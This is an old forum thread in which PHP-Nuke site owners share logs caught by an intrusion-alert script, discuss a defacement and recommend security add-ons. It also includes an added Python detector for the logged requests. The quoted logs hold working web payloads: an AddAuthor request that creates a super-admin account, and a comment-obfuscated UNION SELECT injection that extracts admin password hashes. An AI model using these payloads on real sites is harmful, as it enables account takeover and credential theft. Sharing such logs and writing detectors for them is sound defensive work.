sharlein Member Emeritus
Joined: Nov 19, 2002 Posts: 322 Location: On the Road
Posted: Wed Mar 31, 2004 9:58 am
Quote: 80.55.93.226
DOCUMENT_ROOT :public_html
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pl
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
PATH : /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR : 80.55.93.226
REMOTE_PORT : 1864
SCRIPT_FILENAME : html/hackattempt.php
SERVER_ADDR :
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT :
SERVER_SIGNATURE : Apache/1.3.29 Server at Port 80
SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
REQUEST_URI : /Nuke/html/hackattempt.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
SCRIPT_NAME : html/hackattempt.php
PATH_TRANSLATED : html/hackattempt.php
PHP_SELF : html/hackattempt.php
argv : Array
argc : 1
64bitguy The Mouse Is Extension Of Arm
Joined: Mar 06, 2004 Posts: 1156 Location: Sanbornton, NH USA
Posted: Mon Apr 05, 2004 12:27 am
This one busted by RavenScript Tonight.
The Proxy reported by the Script was:
Quote: 80.80.128.163
HTTP_X_FORWARDED_FOR : 80.80.133.68
REMOTE_ADDR : 80.80.128.163
REMOTE_PORT : 53987
SCRIPT_FILENAME : /hackattempt.php
SERVER_NAME :
SERVER_PORT : 80
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
A closer look at the IP address forwarded by the Proxy in this attack (80.80.133.68) revealed:
Quote:
Last edited by 64bitguy on Thu Apr 08, 2004 6:05 pm; edited 3 times in total
64bitguy The Mouse Is Extension Of Arm
Joined: Mar 06, 2004 Posts: 1156 Location: Sanbornton, NH USA
Posted: Thu Apr 08, 2004 6:02 pm
Busted 217.219.75.92 / 216.148.246.70
Quote:
HTTP_VIA : 1.1 cssj3prx02.marketscore.com (NGP Diatom vfc3), 1.0 cssj3che01 (NetCache NetApp/5.2.1R1)
HTTP_X_FORWARDED_FOR : 217.219.75.92, 10.101.3.111
REMOTE_ADDR : 216.148.246.70
REMOTE_PORT : 20409
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
HauntedWebby Involved
Joined: May 19, 2004 Posts: 363 Location: Ogden, UT
Posted: Thu May 20, 2004 9:56 am
Ravan caught one for me - May 19, 2004 10:19PM (MST)
Quote: 201.5.225.38
PATH : /usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT : /h*/l*/p*
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pt-br
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english; msa_resolution=1024x768x32
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
REMOTE_ADDR : 201.5.225.38
REMOTE_PORT : 1369
SCRIPT_FILENAME : /h*/l*/p*/hackattempt.php
SERVER_ADDR : 66.**.2**.73
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT : 80
SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a PHP-CGI/0.1b
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
REQUEST_URI : /hackattempt.php?name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
argv : Array
argc : 1
Raven Site Admin/Owner
Joined: Aug 27, 2002 Posts: 16986 Location: Kansas
Posted: Thu May 20, 2004 10:40 am
jamesmc New Member
Joined: Dec 22, 2003 Posts: 21
Posted: Tue Jun 01, 2004 6:13 am
My site was hacked this weekend despite the script being in place and operational (tested as per Raven's Readme file). They must have found another way in. How, I don't know, as no report was generated and emailed.
Plastered all over the place was: 'This Sait Hacked by Leroy Security Team'
Wouldn't be so bad if they could at least spell!!
Are there any other security enhancements that you guys can recommend?
regards
James Mc
Raven Site Admin/Owner
Joined: Aug 27, 2002 Posts: 16986 Location: Kansas
Posted: Tue Jun 01, 2004 6:27 am
This hack alert script is strictly for the UNION type attacks. Unless you have installed Chatserv's security fixes then you have been and are at risk. However, this script has been supplanted by Sentinel(tm) which is a comprehensive security application. You should install Sentinel immediately and then check your logs to discover what method the hackers used.
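The two request shapes quoted earlier in this thread (sharlein's op=AddAuthor call with add_radminsuper=1, and HauntedWebby's jokeid value carrying a UNION SELECT with /**/ in place of spaces) can be picked out of a web log with a check like the one below, which also keeps the proxy chain from 64bitguy's post apart from the address the server actually talked to. This is an added example, not Raven's hackattempt.php or Sentinel; the sample requests are constructed from the posts above, and the tag names and function names are my own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample requests modelled on the three kinds quoted in this thread
# (not real log lines): an AddAuthor call, a comment-obfuscated UNION SELECT,
# and a harmless request that arrived through a proxy chain.
SAMPLE_REQUESTS = [
    {"remote_addr": "80.55.93.226", "xff": "",
     "uri": "/Nuke/html/hackattempt.php?op=AddAuthor&add_aid=attacker&add_name=God"
            "&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1"},
    {"remote_addr": "201.5.225.38", "xff": "",
     "uri": "/hackattempt.php?name=nukejokes&file=print&jokeid=-1/**/union/**/select"
            "/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*"},
    {"remote_addr": "216.148.246.70", "xff": "217.219.75.92, 10.101.3.111",
     "uri": "/modules.php?name=News&file=article&sid=42"},
]

UNION_RE = re.compile(r"\bunion\b.*\bselect\b")

def normalise(value):
    """Undo the tricks seen in the posts: percent-encoding, /**/ as whitespace, case."""
    value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)   # inline comments stand in for spaces
    return re.sub(r"\s+", " ", value).lower()

def classify(uri):
    """Return a list of finding tags for one request URI (empty if nothing matched)."""
    _path, _, query = uri.partition("?")
    params = parse_qs(query, keep_blank_values=True)
    findings = []
    # PHP-Nuke author creation with the super-admin flag set, as in sharlein's post
    if params.get("op") == ["AddAuthor"] and params.get("add_radminsuper") == ["1"]:
        findings.append("addauthor-superadmin")
    # UNION ... SELECT inside any parameter value, as in HauntedWebby's jokeid post
    for key, values in params.items():
        if any(UNION_RE.search(normalise(v)) for v in values):
            findings.append(f"union-select:{key}")
    return findings

def client_chain(remote_addr, xff):
    """Hops to report, origin first. X-Forwarded-For is supplied by the proxy (or the
    client) and cannot be verified; REMOTE_ADDR is the only peer the server spoke to."""
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    return hops + [remote_addr]

def scan(requests):
    """Run classify() over the requests and return (chain, findings) for every hit."""
    return [(client_chain(r["remote_addr"], r["xff"]), classify(r["uri"]))
            for r in requests if classify(r["uri"])]
```

Only the last element of each chain (REMOTE_ADDR) is a reliable address to block or report; the forwarded hops are worth logging but an attacker can set them to anything.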
HauntedWebby Involved
Joined: May 19, 2004 Posts: 363 Location: Ogden, UT
Posted: Tue Jun 01, 2004 9:47 am
I have all three (this script, chatserv & Sentinel) and I went from being hacked once a week to not seeing anything.
jamesmc New Member
Joined: Dec 22, 2003 Posts: 21
Posted: Tue Jun 01, 2004 4:34 pm
Hi Raven
Thanks for the input. Much appreciated.
Keep up the good work..
regards
James Mc